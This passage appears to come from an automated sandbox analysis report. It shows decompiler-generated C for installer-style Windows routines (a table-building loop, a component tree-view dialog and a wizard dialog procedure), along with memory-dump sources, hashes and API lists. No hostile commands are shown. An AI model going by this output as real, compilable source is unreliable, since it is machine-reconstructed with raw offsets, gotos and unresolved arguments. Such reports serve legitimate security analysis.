                						} while (_t271 < _a8);
                						_v16 = _v16 | 0xffffffff;
                						_v40 = _v40 & 0x00000000;
                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                						_t195 = _v8;
                						_t186 =  ~_a28;
                						_v12 = _t168;
                						_v180 = _t168;
                						_v36 = 0x42d6a8;
                						_v240 = _t168;
                						if(_t195 > _v28) {
                							L62:
                							_t168 = 0;
                							if(_v52 == 0 || _v28 == 1) {
                								return _t168;
                							} else {
                								goto L64;
                							}
                						}
                						_v44 = _t195 - 1;
                						_v32 = _t299 + _t195 * 4 - 0x70;
                						do {
                							_t282 =  *_v32;
                							if(_t282 == 0) {
                								goto L61;
                							}
                							while(1) {
                								_t283 = _t282 - 1;
                								_t200 = _a28 + _t186;
                								_v48 = _t283;
                								_v24 = _t200;
                								if(_v8 <= _t200) {
                									goto L45;
                								}
                								L31:
                								_v20 = _t283 + 1;
                								do {
                									_v16 = _v16 + 1;
                									_t296 = _v28 - _v24;
                									if(_t296 > _a28) {
                										_t296 = _a28;
                									}
                									_t222 = _v8 - _v24;
                									_t254 = 1 << _t222;
                									if(1 <= _v20) {
                										L40:
                										_t256 =  *_a36;
                										_t168 = 1 << _t222;
                										_v40 = 1;
                										_t274 = _t256 + 1;
                										if(_t274 > 0x5a0) {
                											goto L64;
                										}
                									} else {
                										_t275 = _v32;
                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                										if(_t222 >= _t296) {
                											goto L40;
                										}
                										while(1) {
                											_t222 = _t222 + 1;
                											if(_t222 >= _t296) {
                												goto L40;
                											}
                											_t275 = _t275 + 4;
                											_t264 = _t263 + _t263;
                											_t175 =  *_t275;
                											if(_t264 <= _t175) {
                												goto L40;
                											}
                											_t263 = _t264 - _t175;
                										}
                										goto L40;
                									}
                									_t168 = _a32 + _t256 * 4;
                									_t297 = _t299 + _v16 * 4 - 0xec;
                									 *_a36 = _t274;
                									_t259 = _v16;
                									 *_t297 = _t168;
                									if(_t259 == 0) {
                										 *_a24 = _t168;
                									} else {
                										_t276 = _v12;
                										_t298 =  *((intOrPtr*)(_t297 - 4));
                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                										_a5 = _a28;
                										_a4 = _t222;
                										_t262 = _t276 >> _t186;
                										_a6 = (_t168 - _t298 >> 2) - _t262;
                										 *(_t298 + _t262 * 4) = _a4;
                									}
                									_t224 = _v24;
                									_t186 = _t224;
                									_t225 = _t224 + _a28;
                									_v24 = _t225;
                								} while (_v8 > _t225);
                								L45:
                								_t284 = _v36;
                								_a5 = _v8 - _t186;
                								if(_t284 < 0x42d6a8 + _a8 * 4) {
                									_t205 =  *_t284;
                									if(_t205 >= _a12) {
                										_t207 = _t205 - _a12 + _t205 - _a12;
                										_v36 =  &(_v36[1]);
                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                									} else {
                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                										_t208 =  *_t284;
                										_v36 =  &(_t284[1]);
                									}
                									_a6 = _t208;
                								} else {
                									_a4 = 0xc0;
                								}
                								_t286 = 1 << _v8 - _t186;
                								_t244 = _v12 >> _t186;
                								while(_t244 < _v40) {
                									 *(_t168 + _t244 * 4) = _a4;
                									_t244 = _t244 + _t286;
                								}
                								_t287 = _v12;
                								_t246 = 1 << _v44;
                								while((_t287 & _t246) != 0) {
                									_t287 = _t287 ^ _t246;
                									_t246 = _t246 >> 1;
                								}
                								_t288 = _t287 ^ _t246;
                								_v20 = 1;
                								_v12 = _t288;
                								_t251 = _v16;
                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                									L60:
                									if(_v48 != 0) {
                										_t282 = _v48;
                										_t283 = _t282 - 1;
                										_t200 = _a28 + _t186;
                										_v48 = _t283;
                										_v24 = _t200;
                										if(_v8 <= _t200) {
                											goto L45;
                										}
                										goto L31;
                									}
                									break;
                								} else {
                									goto L58;
                								}
                								do {
                									L58:
                									_t186 = _t186 - _a28;
                									_t251 = _t251 - 1;
                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                								_v16 = _t251;
                								goto L60;
                							}
                							L61:
                							_v8 = _v8 + 1;
                							_v32 = _v32 + 4;
                							_v44 = _v44 + 1;
                						} while (_v8 <= _v28);
                						goto L62;
                					}
                					_t277 = 0;
                					do {
                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                						_t277 = _t277 + 4;
                						_t235 = _t235 - 1;
                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                					} while (_t235 != 0);
                					goto L21;
                				}
                				 *_a24 =  *_a24 & 0x00000000;
                				 *_a28 =  *_a28 & 0x00000000;
                				return 0;
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                • Instruction ID: a299d0d8e9b10ca62ceeed6f7fdea941f445a233f6f953c64edc6e6e29257575
                • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                • Instruction Fuzzy Hash: CA010C78A22249EFCB51DFA9C580A9DBBF5EB08620F1185A5EC14E7765D330EE509B40
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				long _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				signed char* _v32;
                				int _v36;
                				signed int _v44;
                				int _v48;
                				signed int* _v60;
                				signed char* _v64;
                				signed int _v68;
                				long _v72;
                				void* _v76;
                				intOrPtr _v80;
                				intOrPtr _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t203;
                				intOrPtr _t206;
                				intOrPtr _t207;
                				long _t212;
                				signed int _t216;
                				signed int _t227;
                				void* _t230;
                				void* _t231;
                				int _t237;
                				long _t242;
                				long _t243;
                				signed int _t244;
                				signed int _t250;
                				signed int _t252;
                				signed char _t253;
                				signed char _t259;
                				void* _t264;
                				void* _t266;
                				signed char* _t284;
                				signed char _t285;
                				long _t290;
                				signed int _t300;
                				signed int _t308;
                				signed char* _t316;
                				int _t320;
                				int _t321;
                				signed int* _t322;
                				int _t323;
                				long _t324;
                				signed int _t325;
                				long _t327;
                				int _t328;
                				signed int _t329;
                				void* _t331;
                
                				_v12 = GetDlgItem(_a4, 0x3f9);
                				_v8 = GetDlgItem(_a4, 0x408);
                				_t331 = SendMessageA;
                				_v24 =  *0x42f468;
                				_v28 =  *0x42f434 + 0x94;
                				_t320 = 0x10;
                				if(_a8 != 0x110) {
                					L23:
                					if(_a8 != 0x405) {
                						_t298 = _a16;
                					} else {
                						_a12 = 0;
                						_t298 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					if(_a8 == 0x4e || _a8 == 0x413) {
                						_v16 = _t298;
                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                							if(( *0x42f43d & 0x00000002) != 0) {
                								L41:
                								if(_v16 != 0) {
                									_t242 = _v16;
                									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                									}
                									_t243 = _v16;
                									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                										_t298 = _v24;
                										_t244 =  *(_t243 + 0x5c);
                										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                										} else {
                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							if(_a8 == 0x413) {
                								L33:
                								_t298 = 0 | _a8 != 0x00000413;
                								_t250 = E00404ACE(_v8, _a8 != 0x413);
                								_t325 = _t250;
                								if(_t325 >= 0) {
                									_t99 = _v24 + 8; // 0x8
                									_t298 = _t250 * 0x418 + _t99;
                									_t252 =  *_t298;
                									if((_t252 & 0x00000010) == 0) {
                										if((_t252 & 0x00000040) == 0) {
                											_t253 = _t252 ^ 0x00000001;
                										} else {
                											_t259 = _t252 ^ 0x00000080;
                											if(_t259 >= 0) {
                												_t253 = _t259 & 0x000000fe;
                											} else {
                												_t253 = _t259 | 0x00000001;
                											}
                										}
                										 *_t298 = _t253;
                										E0040117D(_t325);
                										_a12 = _t325 + 1;
                										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                										_a8 = 0x40f;
                									}
                								}
                								goto L41;
                							}
                							_t298 = _a16;
                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						} else {
                							goto L48;
                						}
                					} else {
                						L48:
                						if(_a8 != 0x111) {
                							L56:
                							if(_a8 == 0x200) {
                								SendMessageA(_v8, 0x200, 0, 0);
                							}
                							if(_a8 == 0x40b) {
                								_t230 =  *0x42a874;
                								if(_t230 != 0) {
                									ImageList_Destroy(_t230);
                								}
                								_t231 =  *0x42a888;
                								if(_t231 != 0) {
                									GlobalFree(_t231);
                								}
                								 *0x42a874 = 0;
                								 *0x42a888 = 0;
                								 *0x42f4a0 = 0;
                							}
                							if(_a8 != 0x40f) {
                								L90:
                								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                									_t321 = (0 | _a16 == 0x00000020) << 3;
                									ShowWindow(_v8, _t321);
                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                								}
                								goto L93;
                							} else {
                								E004011EF(_t298, 0, 0);
                								_t203 = _a12;
                								if(_t203 != 0) {
                									if(_t203 != 0xffffffff) {
                										_t203 = _t203 - 1;
                									}
                									_push(_t203);
                									_push(8);
                									E00404B4E();
                								}
                								if(_a16 == 0) {
                									L75:
                									E004011EF(_t298, 0, 0);
                									_v36 =  *0x42a888;
                									_t206 =  *0x42f468;
                									_v64 = 0xf030;
                									_v24 = 0;
                									if( *0x42f46c <= 0) {
                										L86:
                										if( *0x42f42c == 4) {
                											InvalidateRect(_v8, 0, 1);
                										}
                										_t207 =  *0x42ebfc; // 0x739685
                										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                										}
                										goto L90;
                									}
                									_t322 = _t206 + 8;
                									do {
                										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                										if(_t212 != 0) {
                											_t300 =  *_t322;
                											_v72 = _t212;
                											_v76 = 8;
                											if((_t300 & 0x00000001) != 0) {
                												_v76 = 9;
                												_v60 =  &(_t322[4]);
                												_t322[0] = _t322[0] & 0x000000fe;
                											}
                											if((_t300 & 0x00000040) == 0) {
                												_t216 = (_t300 & 0x00000001) + 1;
                												if((_t300 & 0x00000010) != 0) {
                													_t216 = _t216 + 3;
                												}
                											} else {
                												_t216 = 3;
                											}
                											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                											SendMessageA(_v8, 0x110d, 0,  &_v76);
                										}
                										_v24 = _v24 + 1;
                										_t322 =  &(_t322[0x106]);
                									} while (_v24 <  *0x42f46c);
                									goto L86;
                								} else {
                									_t323 = E004012E2( *0x42a888);
                									E00401299(_t323);
                									_t227 = 0;
                									_t298 = 0;
                									if(_t323 <= 0) {
                										L74:
                										SendMessageA(_v12, 0x14e, _t298, 0);
                										_a16 = _t323;
                										_a8 = 0x420;
                										goto L75;
                									} else {
                										goto L71;
                									}
                									do {
                										L71:
                										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                											_t298 = _t298 + 1;
                										}
                										_t227 = _t227 + 1;
                									} while (_t227 < _t323);
                									goto L74;
                								}
                							}
                						}
                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                							goto L93;
                						} else {
                							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                							if(_t237 == 0xffffffff) {
                								goto L93;
                							}
                							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                								_t324 = 0x20;
                							}
                							E00401299(_t324);
                							SendMessageA(_a4, 0x420, 0, _t324);
                							_a12 = _a12 | 0xffffffff;
                							_a16 = 0;
                							_a8 = 0x40f;
                							goto L56;
                						}
                					}
                				} else {
                					_v36 = 0;
                					 *0x42f4a0 = _a4;
                					_v20 = 2;
                					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                					 *0x42a87c =  *0x42a87c | 0xffffffff;
                					_v16 = _t264;
                					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                					 *0x42a874 = _t266;
                					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                						SendMessageA(_v8, 0x111b, _t320, 0);
                					}
                					DeleteObject(_v16);
                					_t327 = 0;
                					do {
                						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                							if(_t327 != 0x20) {
                								_v20 = 0;
                							}
                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                						}
                						_t327 = _t327 + 1;
                					} while (_t327 < 0x21);
                					_t328 = _a16;
                					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                					_push(0x15);
                					E0040417B(_a4);
                					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                					_push(0x16);
                					E0040417B(_a4);
                					_t329 = 0;
                					_v16 = 0;
                					if( *0x42f46c <= 0) {
                						L19:
                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t316 = _v24 + 8;
                						_v32 = _t316;
                						do {
                							_t284 =  &(_t316[0x10]);
                							if( *_t284 != 0) {
                								_v64 = _t284;
                								_t285 =  *_t316;
                								_v88 = _v16;
                								_t308 = 0x20;
                								_v84 = 0xffff0002;
                								_v80 = 0xd;
                								_v68 = _t308;
                								_v44 = _t329;
                								_v72 = _t285 & _t308;
                								if((_t285 & 0x00000002) == 0) {
                									if((_t285 & 0x00000004) == 0) {
                										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                									} else {
                										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                									}
                								} else {
                									_v80 = 0x4d;
                									_v48 = 1;
                									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                									_v36 = 1;
                									 *( *0x42a888 + _t329 * 4) = _t290;
                									_v16 =  *( *0x42a888 + _t329 * 4);
                								}
                							}
                							_t329 = _t329 + 1;
                							_t316 =  &(_v32[0x418]);
                							_v32 = _t316;
                						} while (_t329 <  *0x42f46c);
                						if(_v36 != 0) {
                							L20:
                							if(_v20 != 0) {
                								E004041B0(_v8);
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E004041B0(_v12);
                								L93:
                								return E004041E2(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 2564846305-813528018
                • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                				struct HWND__* _v32;
                				void* _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				signed int _t37;
                				signed int _t39;
                				struct HWND__* _t49;
                				signed int _t68;
                				struct HWND__* _t74;
                				signed int _t87;
                				struct HWND__* _t92;
                				signed int _t100;
                				int _t104;
                				signed int _t116;
                				signed int _t117;
                				int _t118;
                				signed int _t123;
                				struct HWND__* _t126;
                				struct HWND__* _t127;
                				int _t128;
                				long _t131;
                				int _t133;
                				int _t134;
                				void* _t135;
                				void* _t143;
                
                				_t116 = _a8;
                				if(_t116 == 0x110 || _t116 == 0x408) {
                					_t35 = _a12;
                					_t126 = _a4;
                					__eflags = _t116 - 0x110;
                					 *0x42a878 = _t35;
                					if(_t116 == 0x110) {
                						 *0x42f428 = _t126;
                						 *0x42a88c = GetDlgItem(_t126, 1);
                						_t92 = GetDlgItem(_t126, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x429858 = _t92;
                						E0040417B(_t126);
                						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
                						 *0x42ebec = E0040140B(4);
                						_t35 = 1;
                						__eflags = 1;
                						 *0x42a878 = 1;
                					}
                					_t123 =  *0x40a1dc; // 0xffffffff
                					_t134 = 0;
                					_t131 = (_t123 << 6) +  *0x42f460;
                					__eflags = _t123;
                					if(_t123 < 0) {
                						L34:
                						E004041C7(0x40b);
                						while(1) {
                							_t37 =  *0x42a878;
                							 *0x40a1dc =  *0x40a1dc + _t37;
                							_t131 = _t131 + (_t37 << 6);
                							_t39 =  *0x40a1dc; // 0xffffffff
                							__eflags = _t39 -  *0x42f464;
                							if(_t39 ==  *0x42f464) {
                								E0040140B(1);
                							}
                							__eflags =  *0x42ebec - _t134; // 0x0
                							if(__eflags != 0) {
                								break;
                							}
                							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
                							if(__eflags >= 0) {
                								break;
                							}
                							_t117 =  *(_t131 + 0x14);
                							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                							_push( *((intOrPtr*)(_t131 + 0x20)));
                							_push(0xfffffc19);
                							E0040417B(_t126);
                							_push( *((intOrPtr*)(_t131 + 0x1c)));
                							_push(0xfffffc1b);
                							E0040417B(_t126);
                							_push( *((intOrPtr*)(_t131 + 0x28)));
                							_push(0xfffffc1a);
                							E0040417B(_t126);
                							_t49 = GetDlgItem(_t126, 3);
                							__eflags =  *0x42f4cc - _t134;
                							_v32 = _t49;
                							if( *0x42f4cc != _t134) {
                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                								__eflags = _t117;
                							}
                							ShowWindow(_t49, _t117 & 0x00000008);
                							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                							E0040419D(_t117 & 0x00000002);
                							_t118 = _t117 & 0x00000004;
                							EnableWindow( *0x429858, _t118);
                							__eflags = _t118 - _t134;
                							if(_t118 == _t134) {
                								_push(1);
                							} else {
                								_push(_t134);
                							}
                							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                							__eflags =  *0x42f4cc - _t134;
                							if( *0x42f4cc == _t134) {
                								_push( *0x42a88c);
                							} else {
                								SendMessageA(_t126, 0x401, 2, _t134);
                								_push( *0x429858);
                							}
                							E004041B0();
                							E004060F7(0x42a890, E00403C88());
                							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                							SetWindowTextA(_t126, 0x42a890);
                							_push(_t134);
                							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                							__eflags = _t68;
                							if(_t68 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t131 - _t134;
                								if( *_t131 == _t134) {
                									continue;
                								}
                								__eflags =  *(_t131 + 4) - 5;
                								if( *(_t131 + 4) != 5) {
                									DestroyWindow( *0x42ebf8);
                									 *0x42a068 = _t131;
                									__eflags =  *_t131 - _t134;
                									if( *_t131 <= _t134) {
                										goto L58;
                									}
                									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                									__eflags = _t74 - _t134;
                									 *0x42ebf8 = _t74;
                									if(_t74 == _t134) {
                										goto L58;
                									}
                									_push( *((intOrPtr*)(_t131 + 0x2c)));
                									_push(6);
                									E0040417B(_t74);
                									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                									ScreenToClient(_t126, _t135 + 0x10);
                									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                									_push(_t134);
                									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                									__eflags =  *0x42ebec - _t134; // 0x0
                									if(__eflags != 0) {
                										goto L61;
                									}
                									ShowWindow( *0x42ebf8, 8);
                									E004041C7(0x405);
                									goto L58;
                								}
                								__eflags =  *0x42f4cc - _t134;
                								if( *0x42f4cc != _t134) {
                									goto L61;
                								}
                								__eflags =  *0x42f4c0 - _t134;
                								if( *0x42f4c0 != _t134) {
                									continue;
                								}
                								goto L61;
                							}
                						}
                						DestroyWindow( *0x42ebf8);
                						 *0x42f428 = _t134;
                						EndDialog(_t126,  *0x429c60);
                						goto L58;
                					} else {
                						__eflags = _t35 - 1;
                						if(_t35 != 1) {
                							L33:
                							__eflags =  *_t131 - _t134;
                							if( *_t131 == _t134) {
                								goto L61;
                							}
                							goto L34;
                						}
                						_push(0);
                						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                						__eflags = _t87;
                						if(_t87 == 0) {
                							goto L33;
                						}
                						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                						__eflags =  *0x42ebec - _t134; // 0x0
                						return 0 | __eflags == 0x00000000;
                					}
                				} else {
                					_t126 = _a4;
                					_t134 = 0;
                					if(_t116 == 0x47) {
                						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
                					}
                					if(_t116 == 5) {
                						asm("sbb eax, eax");
                						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
                					}
                					if(_t116 != 0x40d) {
                						__eflags = _t116 - 0x11;
                						if(_t116 != 0x11) {
                							__eflags = _t116 - 0x111;
                							if(_t116 != 0x111) {
                								L26:
                								return E004041E2(_t116, _a12, _a16);
                							}
                							_t133 = _a12 & 0x0000ffff;
                							_t127 = GetDlgItem(_t126, _t133);
                							__eflags = _t127 - _t134;
                							if(_t127 == _t134) {
                								L13:
                								__eflags = _t133 - 1;
                								if(_t133 != 1) {
                									__eflags = _t133 - 3;
                									if(_t133 != 3) {
                										_t128 = 2;
                										__eflags = _t133 - _t128;
                										if(_t133 != _t128) {
                											L25:
                											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                											goto L26;
                										}
                										__eflags =  *0x42f4cc - _t134;
                										if( *0x42f4cc == _t134) {
                											_t100 = E0040140B(3);
                											__eflags = _t100;
                											if(_t100 != 0) {
                												goto L26;
                											}
                											 *0x429c60 = 1;
                											L21:
                											_push(0x78);
                											L22:
                											E00404154();
                											goto L26;
                										}
                										E0040140B(_t128);
                										 *0x429c60 = _t128;
                										goto L21;
                									}
                									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                									if(__eflags <= 0) {
                										goto L25;
                									}
                									_push(0xffffffff);
                									goto L22;
                								}
                								_push(_t133);
                								goto L22;
                							}
                							SendMessageA(_t127, 0xf3, _t134, _t134);
                							_t104 = IsWindowEnabled(_t127);
                							__eflags = _t104;
                							if(_t104 == 0) {
                								goto L61;
                							}
                							goto L13;
                						}
                						SetWindowLongA(_t126, _t134, _t134);
                						return 1;
                					} else {
                						DestroyWindow( *0x42ebf8);
                						 *0x42ebf8 = _a12;
                						L58:
                						if( *0x42b890 == _t134) {
                							_t143 =  *0x42ebf8 - _t134; // 0x0
                							if(_t143 != 0) {
                								ShowWindow(_t126, 0xa);
                								 *0x42b890 = 1;
                							}
                						}
                						L61:
                						return 0;
                					}
                				}
                			}

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                • ShowWindow.USER32(?), ref: 00403D00
                • DestroyWindow.USER32 ref: 00403D14
                • SetWindowLongA.USER32 ref: 00403D30
                • GetDlgItem.USER32 ref: 00403D51
                • SendMessageA.USER32 ref: 00403D65
                • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                • GetDlgItem.USER32 ref: 00403E1A
                • GetDlgItem.USER32 ref: 00403E24
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                • SendMessageA.USER32 ref: 00403E8F
                • GetDlgItem.USER32 ref: 00403F35
                • ShowWindow.USER32(00000000,?), ref: 00403F56
                • EnableWindow.USER32(?,?), ref: 00403F68
                • EnableWindow.USER32(?,?), ref: 00403F83
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                • EnableMenuItem.USER32 ref: 00403FA0
                • SendMessageA.USER32 ref: 00403FB8
                • SendMessageA.USER32 ref: 00403FCB
                • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                • ShowWindow.USER32(?,0000000A), ref: 00404138
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
